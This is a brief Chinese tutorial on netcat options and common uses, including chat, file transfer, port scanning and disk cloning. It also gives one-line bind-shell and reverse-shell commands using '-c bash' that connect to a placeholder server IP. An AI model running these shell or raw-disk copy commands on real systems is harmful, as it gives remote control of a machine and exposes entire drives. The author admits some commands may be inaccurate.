nc的一些功能

NC是一个简单，小巧但功能强大，并且十分好用的工具。

参　　数：
-c <shell命令> 为“-e”；使用/bin/sh执行

-e <文件名> 连接后要执行的程序

-b 允许广播
-g<网关> 设置路由器跃程通信网关，最多可设置8个。

-G<指向器数目> 设置来源路由指向器，其数值为4的倍数。

-h 在线帮助。

-i<延迟秒数> 设置时间间隔，以便传送信息及扫描通信端口。

-l 使用监听模式，管控传入的资料。

-n 直接使用IP地址，而不通过域名服务器。

-o<输出文件> 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。

-p<通信端口> 设置本地主机使用的通信端口。

-r 随机指定本地与远端主机的通信端口。
-k 在socket上设置keepalive选项
-s<来源地址> 设置本地主机送出数据包的IP地址。
-t 回答TELNET交涉
-u 使用UDP传输协议。
-C 将CRLF作为行尾发送
-v 显示指令执行过程。
-q <秒数>无响应多少秒后退出
-w<超时秒数> 设置等待连线的时间。
-T<>设置服务类型
-z 使用0输入/输出模式，只在扫描通信端口时使用。

常用命令
nc的聊天功能（挺有意思的）

A(服务端):nc -lp 333(端口随意，不冲突就行)
B(客户端):nc -nv 服务端ip 333

远程控制 可以理解成主动去店里消费

  A(服务端):nc -lp 333(端口随意，不冲突就行) -c bash(windows为cmd)
  B(客户端):nc  -nv 服务端ip 333

远程控制（反向）可以理解成上门服务

A(客户端):nc -lp 333(端口随意，不冲突就行) 
B(服务端):nc  -nv 服务端ip 333 -c bash(windows为cmd)

传输文件（可组合其它工具对文件进行加密传输）

A：nc -lp 333 > 文件
B：nc -nv 1.1.1.1 333 < 文件 –q 1 
或 
A：nc -q 1 -lp 333 < 文件
B：nc -nv 1.1.1.1 333 >文件

端口扫描

  nc -nvz 目标ip地址 端口范围（例如1-1000）
  nc -vnzu 目标ip地址 端口范围

远程克隆

A： nc -lp 端口号 | dd of=/dev/sda 
B： dd if=/dev/sda | nc -nv 目标ip地址 端口号 –q 1 

文件拷贝
从B拷贝文件到A

A:nc -w 1 目标IP地址 端口号 < 文件名
B:nc -l 端口号 > 文件名

可根据各自环境调整选项，还可以结合Linux其它命令、管道符等实现流媒体、传输文本、目录等并对其加密，但我从没试过就不在此演示。有些命令好久没用了，可能有错误之处，望谅解。